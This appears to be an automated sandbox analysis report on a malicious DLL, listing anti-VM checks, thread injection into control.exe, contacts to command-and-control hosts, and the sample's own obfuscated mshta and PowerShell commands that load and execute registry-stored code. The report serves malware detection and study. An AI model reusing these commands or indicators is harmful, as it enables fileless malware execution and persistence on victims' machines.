            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084Thread sleep time: -1773297476s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084Thread sleep count: 799 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5772Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep count: 6259 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep count: 2927 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620Thread sleep time: -19369081277395017s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep count: 6479 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704Thread sleep count: 2798 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 452Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5152Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 390
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 799
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1425
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 506
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1129
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1555
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 870
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 862
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6259
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2927
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6479
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2798
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1803
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6739
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2705
            Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWh4[
            Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914184707.0000000000FA1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW-b^u
            Source: mshta.exe, 00000016.00000003.382843473.000001823555B000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7p
            Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.523272114.000000000130A000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: rundll32.exe, 00000004.00000003.811718040.0000000000F5A000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@
            Source: mshta.exe, 00000017.00000002.390538379.000002B5EF59B000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: berukoneru.website
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 79.110.52.144 187
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: windows.update3.com
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 18.219.227.107 187
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 3.12.124.139 187
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
            Writes to foreign memory regionsShow sources
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3472
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3472
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3472
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 9B851580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 9B851580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 9B851580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 9B851580
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
